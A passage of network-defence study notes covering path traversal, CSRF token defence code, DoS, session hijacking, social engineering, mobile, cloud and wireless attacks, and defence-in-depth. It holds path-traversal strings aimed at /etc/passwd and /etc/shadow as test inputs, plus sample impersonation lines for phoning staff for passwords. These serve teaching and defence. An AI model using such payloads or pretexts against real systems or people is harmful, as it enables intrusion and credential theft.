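    "..\\..\\..\\windows\\win.ini",                # backslash variant
    "img/../../../etc/shadow",                  # legitimate prefix, then climbs out
]

if __name__ == "__main__":
    print(resolve_vulnerable(WEB_ROOT, "../../../etc/passwd"))   # /etc/passwd
    for attempt in TRAVERSAL_ATTEMPTS:
        print(attempt, "->", is_served(WEB_ROOT, attempt))         # all None
    print(is_served(WEB_ROOT, "img/../index.html"))               # index.html
```

The check is on the resolved path, not on the presence of "..", so encodings and symlink tricks are handled by the same comparison. In a real server, also open the file with the resolved path (not the original string) so that the check and the open refer to the same object.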


5. Cross-site Request Forgery (CSRF) Attack

Cross-site request forgery (CSRF) attacks exploit web page vulnerabilities that enable an attacker to force an unsuspecting user’s browser to send malicious requests

The victim user holds an active session with a trusted site and simultaneously visits a malicious site, which injects an HTTP request for the trusted site into the victim’s session, compromising its integrity
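Added example (not from the original notes) of the synchronizer-token defence against the scenario just described: the server issues a token bound to the session with an HMAC, embeds it in its own forms, and rejects a state-changing request whose token is missing or belongs to another session. An Origin check is layered in front of it. The site origin, the attacker origin, the session store and the secret key are assumptions for the example.

```python
import hashlib
import hmac
import secrets

SERVER_SECRET = b"example-only-secret-load-from-config"   # assumption: real key lives in configuration
SITE_ORIGIN = "https://bank.example"                       # assumed trusted site
SESSIONS = {"sess-alice": "alice"}                          # constructed logged-in session


def issue_csrf_token(session_id):
    """Synchronizer token bound to the session: nonce.HMAC(secret, session_id:nonce).
    The server embeds it in its own forms; an attacker's page cannot read it across origins."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id, token):
    if not isinstance(token, str) or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def transfer_handler(request):
    """request: {'cookies': {...}, 'headers': {...}, 'form': {...}} -> (status, body)."""
    session_id = request["cookies"].get("session")
    if session_id not in SESSIONS:
        return 401, "not logged in"
    origin = request["headers"].get("Origin")
    if origin is not None and origin != SITE_ORIGIN:         # browsers send Origin on cross-site POSTs
        return 403, "cross-origin request refused"
    if not verify_csrf_token(session_id, request["form"].get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    return 200, f"{SESSIONS[session_id]} sent {request['form']['amount']} to {request['form']['to']}"


def legitimate_request(token):
    """A POST from the site's own transfer form: cookie, matching Origin, and the embedded token."""
    return {"cookies": {"session": "sess-alice"}, "headers": {"Origin": SITE_ORIGIN},
            "form": {"to": "bob", "amount": "10", "csrf_token": token}}


def forged_request():
    """What an auto-submitting form on attacker.example produces: the browser still attaches the
    session cookie, but the form has no valid token and the Origin names the attacker's site."""
    return {"cookies": {"session": "sess-alice"}, "headers": {"Origin": "https://attacker.example"},
            "form": {"to": "mallory", "amount": "5000"}}


if __name__ == "__main__":
    token = issue_csrf_token("sess-alice")
    print(transfer_handler(legitimate_request(token)))   # (200, 'alice sent 10 to bob')
    print(transfer_handler(forged_request()))            # (403, 'cross-origin request refused')
```

Setting the session cookie with SameSite=Lax or Strict is a third layer that stops the browser attaching the cookie to the forged cross-site POST in the first place; the token check remains the one that does not depend on client behaviour.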


6. Application-level DoS Attack

Attackers exhaust available server resources by sending hundreds of resource-intensive requests such as retrieving large image files or requesting dynamic pages that require expensive search operations on the backend of database servers

Application-level DoS attacks emulate the same request syntax and network-level traffic characteristics as legitimate clients, which makes them difficult for existing DoS protection measures to detect.

Targets

CPU, Memory, and Sockets

Disk Bandwidth

Database Bandwidth

Worker Processes

Why are applications vulnerable to DoS?

Reasonable use expectations

Application Environment Bottlenecks

Implementation Flaws

Poor Data Validation

7. Session Hijacking Attack

Session hijacking refers to an attack where an attacker takes over a valid TCP communication session between two computers

Attackers can sniff all the traffic from the established TCP sessions and perform identity theft, information theft, fraud, etc.

The attacker steals a valid session ID and uses it to authenticate themselves to the server.

social engineering attack techniques

Social engineering is the art of convincing people to reveal confidential information.

Impersonation:

In this social engineering attack, the attacker pretends to be someone legitimate or an authorized person

Attackers may impersonate a legitimate or authorized person either in person or by using a communication medium such as phone, email, etc.

Impersonation enables attackers to trick a target into revealing sensitive information

Posing as a legitimate end user – provide an identity and ask for the sensitive information. "Hi! This is John from the finance department. I have forgotten my password. Can I get it?"

Posing as an important user – posing as a VIP of the target company, a valuable customer, etc. "Hi! This is Kevin, the CFO's secretary. I'm working on an urgent project and lost my system's password. Can you help me out?"

Posing as technical support – call as technical support staff and request IDs and passwords. "Sir, this is Mathew, technical support, X company. Last night we had a system crash here, and we are checking for the lost data. Can you give me your ID and password?"

Eavesdropping

Eavesdropping refers to unauthorized listening of conversations, or reading of messages

Interception of audio, video, or written communication

It can be conducted over communication channels such as telephone lines, email, and instant messaging.

Shoulder Surfing

Shoulder surfing uses direct observation techniques, such as looking over someone's shoulder, to get information such as passwords, PINs, and account numbers.

Shoulder surfing can also be conducted from a longer distance with the aid of vision-enhancing devices such as binoculars that are equipped to obtain information from a distance.

Dumpster Diving

Dumpster diving is looking for sensitive information such as phone bills, contact information, financial information, and operations and related information, in someone’s trash

Piggybacking

An authorized person allows (intentionally or unintentionally) an unauthorized person to pass through a secure door.

Tailgating

An unauthorized person, wearing a fake ID badge, enters a secured area by closely following an authorized person through a door requiring key access.

email attack techniques

Malicious Email Attachments

Email attachments are major security threats, as they may deliver malware such as viruses, worms, trojans, rootkits, and spyware to a victim computer when the victim opens them.

Malicious User Redirection

Emails may contain links, which on clicking may redirect the victim to websites hosting malware

Phishing

The attacker sends an email asking the victim for personal or financial information, along with a link to a site that looks like a genuine website.

If the victim clicks the link, enters details, and then clicks "Submit", the information is sent to the attacker.

Spamming

Spam refers to unsolicited commercial advertisements distributed online. Spam often contains fake, unreliable, and worthless content.

Although email remains the most common way of sending spam, it can also be found in online message boards and chat rooms.

Spam continues to exist due to people who respond to them.

mobile device-specific attack techniques

Rooting and Jailbreaking

Rooting on Android phones – rooting enables Android users to attain privileged control, known as root access, within Android's subsystem. Rooting involves exploiting security vulnerabilities in the device firmware, copying the su binary to a location in the current process's PATH (e.g. /system/xbin/su), and granting it executable permissions with the chmod command.

Jailbreaking on iOS phones – jailbreaking is the process of installing a modified set of kernel patches that enables users to run third-party applications not signed by the OS vendor. Jailbreaking provides root access to the operating system and permits downloading of third-party applications, themes, and extensions on iOS devices.

Uploading Malicious Apps in App Store

Insufficient or no vetting of apps leads to malicious and fake apps entering app marketplace

App stores are common targets for attackers to distribute malware and malicious apps

Attackers can social engineer users to download and run apps outside the official app stores

Malicious apps can damage other applications and data, and send sensitive data to attackers

Mobile Spamming

Unsolicited text/email messages sent to mobile devices from known/unknown phone numbers/email IDs.

Spam messages contain advertisements or malicious links that can trick users into revealing confidential information

A significant amount of bandwidth is wasted by spam messages

Spam attacks are conducted for financial gain

SMS Phishing Attack (SMiShing)

SMS Phishing is the act of attempting to acquire personal and financial information by sending SMS (or IM) containing a deceptive link.

Why is SMS Phishing Effective?

Most users access the Internet through a mobile device

Easy to set up a mobile phishing campaign

Difficult to detect and stop before they cause harm

Mobile users are not accustomed to receiving spam text messages on their mobile

No mainstream mechanism for weeding out spam SMS

Most mobile anti-virus applications do not check the SMS

Bluebugging Attack

Mobile device pairing over open connections (public or unencrypted Wi-Fi) enables attackers to eavesdrop on and intercept data transmissions using techniques such as:

Bluesnarfing (Stealing information via Bluetooth)

Bluebugging (Gaining control over the device via Bluetooth)

Sharing data from malicious devices can infect/breach data on the recipient device


cloud specific attack techniques

  1. Data breach/loss
  2. Abuse and nefarious use of cloud services
  3. Insecure interfaces and APIs
  4. Insufficient due diligence
  5. Shared technology issues
  6. Unknown risk profile
  7. Unsynchronized system clocks
  8. Inadequate infrastructure design and planning
  9. Conflicts between client hardening procedures and cloud environment
  10. Loss of operational and security logs
  11. Malicious insiders
  12. Illegal access to cloud systems
  13. Loss of business reputation due to co-tenant activities
  14. Privilege escalation
  15. Natural disasters
  16. Hardware failure
  17. Supply chain failure
  18. Modifying network traffic
  19. Isolation failure
  20. Cloud provider acquisition
  21. Management interface compromised
  22. Network management failure
  23. Authentication attacks
  24. VM-level attacks
  25. Lock-in
  26. Licensing risks
  27. Loss of governance
  28. Loss of encryption keys
  29. Risks from changes of jurisdiction
  30. Undertaking malicious probes or scans
  31. Theft of computer equipment
  32. Cloud service termination or failure
  33. Subpoena and e-discovery
  34. Improper data handling and disposal
  35. Loss or modification of backup data
  36. Compliance risks
  37. Economic denial of sustainability (EDOS)
  38. Lack of security architecture
  39. Hijacking accounts

OWASP top 10 Cloud Security Risks

R1 – Accountability and Data Ownership – Using public cloud for hosting business services can cause severe risk for the recoverability of data

R2 – User Identity – Creating multiple user identities for different cloud providers makes it complex to manage multiple user IDs and credentials

R3 – Regulatory Compliance – Lack of transparency, and different regulatory laws in different countries

R4 – Business Continuity and Resiliency – Risk or monetary loss if the cloud provider handles business continuity improperly

R5 – User Privacy and Secondary Usage of Data – The default share feature in social websites can jeopardize the privacy of a user's personal data

R6 – Service and Data Integration – Insecure data in transit is susceptible to eavesdropping and interception attacks

R7 – Multi Tenancy and Physical Security – Inadequate logical segregation may lead to tenants interfering with the security features of each other

R8 – Incident Analysis and Forensic Support – Due to the distributed storage of logs across the cloud, law enforcement agencies may face challenges in forensic recovery

R9 – Infrastructure Security – Misconfiguration of infrastructure may allow network scanning for vulnerable applications and services

R10 – Non-Production Environment Exposure – Using non-production environments increases the risk of unauthorized access, information disclosure, and information modification.

wireless network attack techniques

War Driving – Attackers drive around with Wi-Fi-enabled laptops to detect open wireless networks

Client Misassociation – An attacker sets up a rogue access point outside the corporate perimeter and tricks employees to connect to it

Unauthorized Association – Attackers infect a victim machine and activate APs to provide them with an unauthorized connection to the enterprise network

Honeypot Access Point Attack – An attacker traps people by using fake APs

Rogue Access Point Attack – Rogue wireless access points placed in an 802.11 network can be used to hijack the connections of legitimate network users

Misconfigured Access Point Attack – Misconfigured access points let intruders learn the SSID, giving them access to the network

Ad Hoc Connection Attack – Wi-Fi clients communicate directly via an ad hoc mode that does not require an AP to relay packets

AP MAC Spoofing – A hacker spoofs the MAC address of a WLAN client’s equipment to act as an authorized client and connects to the AP as the client and eavesdrop on the traffic.

Denial-of-Service Attacks – Wireless DoS attacks disrupt network wireless connection by sending broadcast “de-authenticate” commands

WPA-PSK Cracking – Attackers sniff and capture authentication packets and run a brute force attack to crack the WPA-PSK key

RADIUS Replay – Attackers replay the valid RADIUS server response and successfully authenticate to the client without valid credentials

MAC Spoofing Attack – An attacker spoofs the MAC of a client and attempts to authenticate to the AP, which leads to the updating of the MAC address info in the network routers and switches

WEP Cracking – Attackers sniff and capture packets and run a WEP cracking program to obtain the WEP key

Man-in-the-middle Attack – Attackers deploy a rogue AP, and spoofs the client’s MAC address to position themselves between the real AP and the Client to listen to the traffic.

Fragmentation Attack – Attackers obtain 1500 bytes of a pseudo random generation algorithm (PRGA) to generate forged WEP packets that are in turn used for various injection attacks.

Jamming Signal Attack – An attacker stakes out the area from a nearby location with a high-gain amplifier, drowning out the legitimate access point.

hacking methodologies and frameworks

Reconnaissance

Scanning

Gaining Access

Maintaining Access

Clearing Tracks

Lockheed Martin's Cyber Kill Chain

Recon – Gather data on the target to probe for weak points

Weaponization – Create a deliverable malicious payload using an exploit and a backdoor

Delivery – Send a weaponized bundle to the victim using email, USB, etc.

Exploitation – Exploit a vulnerability by executing code on the victim system

Installation – Install malware on the target system

Command and Control – Create a command control channel to communicate and pass data back and forth

Actions and Objectives – perform actions to achieve intended objectives and goals

MITRE ATT&CK Framework

attack.mitre.org

Understanding the tactics and techniques adopted by attackers is key to success

The ultimate goal of network defense is to protect an organization's information, systems, and network infrastructure from unauthorized access, misuse, modification, denial of service, or any degradation and disruption

Organizations rely on Information Assurance (IA) principles to attain defense-in-depth security

Information Assurance (IA) principles act as enablers for an organization’s security activities to protect and defend the organizational network from security attacks.

Confidentiality – Ensures information is not disclosed to unauthorized parties

Integrity – Ensures information is not modified or tampered with by unauthorized parties

Availability – Ensures information is available to authorized parties without any disruptions

Non-repudiation – Ensures that a party to a communication cannot deny having sent the message

Authentication – Ensures the identity of an individual is verified by the system or service.

Network Defense Benefits

Protect information assets

Comply with government and industry-specific regulations

Ensure secure communication with clients and suppliers

Reduce the risk of being attacked

Gain competitive edge over competitors by providing more secure services.

Challenges

Distributed Computing Environments: With advances in modern technology and to meet business requirements, networks are becoming vast and complex, potentially leading to serious security vulnerabilities. Attackers exploit exposed security vulnerabilities to compromise network security.

Emerging Threats: Potential threats to the network evolve each day. Network security attacks are becoming technically more sophisticated and better organized.

Lack of Network Security Skills: Organizations are failing to defend themselves against rapidly increasing network attacks due to a lack of network security skills.

Continual / Adaptive Security Strategy

Computer network defense involves applying a set of rules, configurations, processes, and measures to protect the integrity, confidentiality, and availability of the network's information systems and resources.

Network security approaches:

Preventive approaches – consist of methods or techniques that are used to avoid threats or attacks on the target network

Reactive approaches – consist of methods or techniques that are used to detect attacks on the target network

Retrospective Approaches – Consist of methods or techniques that examine the causes for attacks, and contain, remediate, eradicate, and recover from damage caused by the attack on the target network.

Proactive Approaches- Consist of methods or techniques that are used to make informed decisions on potential attacks in the future on the target network

Protect – This includes a set of prior countermeasures taken towards eliminating possible vulnerabilities in the network: protect endpoints, protect networks, protect data

Detect – This involves continuous monitoring of the network and identifying abnormalities and their origins: continuous threat monitoring

Respond – This involves a set of actions taken to contain, eradicate, mitigate, and recover from the impact of attacks on the network: incident response

Predict – This involves identifying the most likely attacks, targets, and methods prior to the materialization of a potential attack: risk and vulnerability assessment, attack surface analysis, threat intelligence

Administrative Security Control

The management implements administrative controls to ensure the safety of the organization

Regulatory framework Compliance

Employee Monitoring and Supervising

Security Policy

Information Classification

Security Awareness and Training

Physical Security

This is a set of security measures taken to prevent unauthorized access to physical devices

Fences

Locks

Badge System

Security guard

Biometrics system

Mantrap doors

Lighting

Motion detectors

Closed-circuit TVs

Alarms

Technical Security Controls

This is a set of security measures taken to protect data and systems from unauthorized personnel

Access Controls

Authentication

Authorization

Auditing

Security Protocols

Network Security Devices
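To make the three access-control measures above concrete, the following added example (not code from the original notes) separates authentication, authorization, and auditing into distinct functions. The user store, roles, policy table, and salt are constructed for the demonstration; PBKDF2 and a constant-time comparison are assumed choices, not something the notes prescribe.

```python
import hashlib
import hmac
from datetime import datetime, timezone

# Constructed sample user store (constructed for this example; a real deployment
# would use a directory or IAM service and a random per-user salt).
_SALT = b"constructed-demo-salt"


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


USERS = {
    "alice": {"hash": _hash_password("correct horse", _SALT), "roles": {"analyst"}},
    "bob":   {"hash": _hash_password("hunter2", _SALT),       "roles": {"viewer"}},
}

# Authorization policy: which roles may perform which action (constructed).
POLICY = {
    "read_logs":   {"analyst", "viewer"},
    "modify_rule": {"analyst"},
}

# Auditing control: every authentication and authorization decision is recorded,
# successes as well as failures, so abnormal activity can be traced to its origin.
AUDIT_LOG = []


def _audit(user: str, action: str, outcome: str) -> None:
    AUDIT_LOG.append({"time": datetime.now(timezone.utc).isoformat(),
                      "user": user, "action": action, "outcome": outcome})


def authenticate(user: str, password: str) -> bool:
    record = USERS.get(user)
    # Compare against a dummy hash for unknown users so timing does not reveal
    # which usernames exist; the comparison itself is constant-time.
    expected = record["hash"] if record else _hash_password("", _SALT)
    ok = hmac.compare_digest(expected, _hash_password(password, _SALT)) and record is not None
    _audit(user, "login", "success" if ok else "failure")
    return ok


def authorize(user: str, action: str) -> bool:
    allowed = bool(USERS.get(user, {}).get("roles", set()) & POLICY.get(action, set()))
    _audit(user, action, "allowed" if allowed else "denied")
    return allowed


def perform(user: str, password: str, action: str) -> bool:
    # Authentication first, then authorization; each is audited independently.
    return authenticate(user, password) and authorize(user, action)
```

A valid login does not by itself grant an action: bob authenticates successfully but is still denied "modify_rule", and both decisions appear in AUDIT_LOG.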

Technology, Operations and People

Appropriate selection of technology, well-defined operations, and skilled people are required for effective implementation of security strategies.

Technology

Selecting appropriate technology is crucial, as improper selection of technology can provide a false sense of security.

Example questionnaire for facilitating appropriate selection of technology:

Which of firewalls, IDS, antivirus, etc., are required for the network?

Which type of encryption algorithm should be used?

Is a centralized or a distributed access mechanism more suitable for the network?

What type of password complexity should be adopted?

Should critical servers be placed on a separate segment?

Operations

Technological implementations are by themselves not sufficient; they should be supported by well-defined operations.

Examples of operations:

Creating and enforcing security policies

Creating and enforcing standard network operations procedures

Planning business continuity

Configuration control management

Creating and implementing incident response processes

Planning disaster recovery

Providing security awareness training

Enforcing security as a culture

People

Appropriate technology and well-defined operations cannot replace skilled people, who are required to implement the technology and manage well-defined operations.

Blue Team:

The people who are collectively responsible for developing effective network defense are generally part of the blue team.

The blue team is responsible for determining the overall adequacy of security measures. They examine the current security status and any security deficiencies existing in the network, and propose effective security measures to defend the network from various types of attacks.

The blue team includes network defenders such as network administrators, network security administrators/engineers, security analysts, network technicians, end users, and people involved in network security operations.

Multi-layered Security – Defense-in-Depth

Data is of utmost importance and is at the core of any organization.

Policies, Procedures, and Awareness – Policies related to Internet access, acceptable use, user accounts, firewalls, email security, passwords, physical security, and BYOD; compliance with standards such as ISO/IEC 27001, PCI-DSS, HIPAA, etc.

Physical – Locks, access controls, security personnel, fire-fighting systems, power supply, video surveillance, lighting, alarm systems, etc.

Perimeter – Servers, DNS, routers, firewalls, switches

Internal Network – Routers, servers, switches, firewalls

Host – OS, antivirus, patch management, password management, logging, etc.

Applications – Blacklisting, whitelisting, patch management, password management, application configuration, firewalls, etc.

Data – Encryption, hashing, data access controls, data leakage prevention, data backup, data recovery, data retention, data disposal, etc.

Organizations should adopt a defense-in-depth security strategy for effective protection of their information systems and resources.


Summary

A threat is an act in which an adversary attempts to gain unauthorized access to an organization’s network by exploiting communication paths.

Intent, capability, and opportunity invariably exist behind the presence of a threat

Attackers follow various attack methodologies for the successful execution of an attack

Computer network defense includes a set of processes and protective measures adopted to defend the network against service or network denial, degradation, and disruption.

The blue team is collectively responsible for developing effective network defense.

Organizations must adopt continual security improvement and defense-in-depth security strategies for effective protection of their information systems and resources.